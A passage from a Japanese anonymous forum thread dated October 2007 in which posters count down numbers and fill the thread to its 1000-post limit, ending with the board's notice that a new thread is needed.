名無しさん@お腹いっぱい。 :2007/10/15(月) 10:35:37
63
938 :
名無しさん@お腹いっぱい。 :2007/10/15(月) 10:36:09
62
939 :
名無しさん@お腹いっぱい。 :2007/10/15(月) 10:36:57
61
940 :
名無しさん@お腹いっぱい。 :2007/10/15(月) 10:39:21
60
941 :
名無しさん@お腹いっぱい。 :2007/10/15(月) 10:40:10
59
942 :
名無しさん@お腹いっぱい。 :2007/10/15(月) 10:40:53
58
943 :
名無しさん@お腹いっぱい。 :2007/10/15(月) 10:42:45
57
944 :
名無しさん@お腹いっぱい。 :2007/10/15(月) 10:44:11
56
945 :
名無しさん@お腹いっぱい。 :2007/10/19(金) 21:02:12
age
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。